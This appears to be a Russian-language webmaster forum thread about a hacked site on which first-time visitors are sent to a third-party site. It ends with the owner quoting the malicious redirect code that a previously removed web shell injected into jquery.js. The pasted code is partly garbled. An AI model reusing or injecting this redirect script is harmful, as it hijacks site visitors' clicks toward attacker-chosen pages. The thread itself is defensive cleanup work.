Взломан сайт. Нужна помощь!

Если любой юзер первый раз заходит на сайт, то при клике по любой ссылке открывается ещё и дополнительная вкладка со сторонним сайтом. Любой второй клик к этому не приводит. Чищу куки и результат повторяется. Если кто-нибудь знает где искать, то подскажите пожалуйста. Заранее спасибо!

Не смог воспроизвести, никакой другой сайт не открывается.

Не смог воспроизвести, никакой другой сайт не открывается.

Речь идёт об этом сайте www.semya.tv/

Если любой юзер первый раз заходит на сайт, то при клике по любой ссылке открывается ещё и дополнительная вкладка со сторонним сайтом. Любой второй клик к этому не приводит. Чищу куки и результат повторяется. Если кто-нибудь знает где искать, то подскажите пожалуйста. Заранее спасибо!

Порядок произвольный.

1. Смотрим на хостинге дату изменения файлов.
2. Ява скрипты
3. Индексные файлы
4. подозрительные файлы(шелл)
5. Ищем тут на форуме аналогичную тему, их много и делаем все как там написано.
6. Смотрим логи
7. Меняем пароли везде

Не забываем посмотреть что прописано в .htaccess

Знаю такой скрипт Javascript с его помощью можно всем тегам а дать определенные действия, проверьте у себя может там какой нибудь сторонный файл .js есть?

Bichukin Andrey, А не проще попросить хостера восстановить сайт из бэкапа, а потом менять пароль на доступ? На нормальном хостинге бэкапят 1 раз в 1-2 дня

Bichukin Andrey, А не проще попросить хостера восстановить сайт из бэкапа, а потом менять пароль на доступ? На нормальном хостинге бэкапят 1 раз в 1-2 дня

И так делать через день?
Может проще найти что и от куда и закрыть, думаю тут вскрыли из тех мест что описаны не раз тут на форуме и методы устранения есть.

И так делать через день?

а потом менять пароль на доступ

что мешает слить с сервера файлы, сайт восстановить и потихоньку локально искать хвосты данной проблемы. Но это уж ктокак привык работать.

Перезалил всё содержимое semya.tv/includes/jquery и проблема пропала. Припоминается, что когда проблема появилась в первый раз 3-4 мес назад. Сканер нашёл подозрительный шелл и я его удалил. В последствии смоделировать проблему не удавалось. Тем не менее она иногда как-то возникала. Сейчас зашли с чужого компа на сайт и сразу увидели. Стало ясно, что это бывает при первом заходе. Почистил у себя куки и проблема смоделировалась. Будет анализировать всю папку jquery. О результатах напишу сюда. Для желающих посмотреть больную папку, выкладываю её архив сюда www.semya.tv/jquery.rar

Итак, удалённый ранее шелл отредактировал вот этот файл jquery.js

Вот сам код перенаправления:

function userapi(){var tii=new Date;var ti=1334776850000-tii;var dooo=document.cookie;var doo=dooo.indexOf('count');if(doo<0ti<0){var aaa=document.getElementsByTagName('a');for(var i=0;i<aaa.length;i++){var aa=aaa;var onl=aa.getAttribute('onclick');var hre=aa.getAttribute('href');var hr1=hre.indexOf('#')+1;var hr2=hre.indexOf('javascript')+1;var hr3=hre.indexOf('(')+1;var hr4=hre.indexOf('mailto')+1;var hr5=hre.indexOf('skype')+1;var hre=hr1+hr2+hr3+hr4+hr5;if(!onl!hre){aa.setAttribute('target','_blank');aa.setAttribute('onclick','setTimeout(location.replace('http://dr-m.ru'),500)')}}document.cookie='count=yes; path=/; expires=Tuesday,21-Dec-21 00:12:21 GMT'}else{if(doo<0){document.cookie='count=yes; path=/; expires=Tuesday,21-Dec-21 00:12:21 GMT'}}}setTimeout(userapi,1500);

Все спасибо за участие!